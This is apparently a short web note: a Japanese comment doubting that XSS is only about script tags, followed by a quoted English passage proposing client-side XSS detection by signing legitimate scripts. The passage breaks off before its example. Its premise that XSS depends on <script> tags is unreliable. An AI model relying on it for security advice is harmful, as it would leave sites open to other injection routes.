SCRIPTタグだけじゃない気がするけど・・・

After considering the previous two points we can conclude that to stop a XSS attack that passed through our server side defenses and validations we need to stop it in the client side and because XSS attacks basically depends on java script which means the existence of <script> tags in the attacker code. So now we can get a conclusion that to stop XSS at the client side we can use java script to filter the return HTML from the server to identify attacker java script and warn the user about it or even warn the site admin about it so s/he can become aware of the attack so s/he can do something about it. But the real question now is how to identify the attacker java script from our legitimate java script? Well, we can do this by supplying something like a signature with our legitimate java script so we can identify it from the malicious attacker java script that have been injected in our web application pages and we can use another java script that will filter the page content to identify the unsigned java script as the attacker script and take some action about it in the client side whenever it’s founded, here is an example "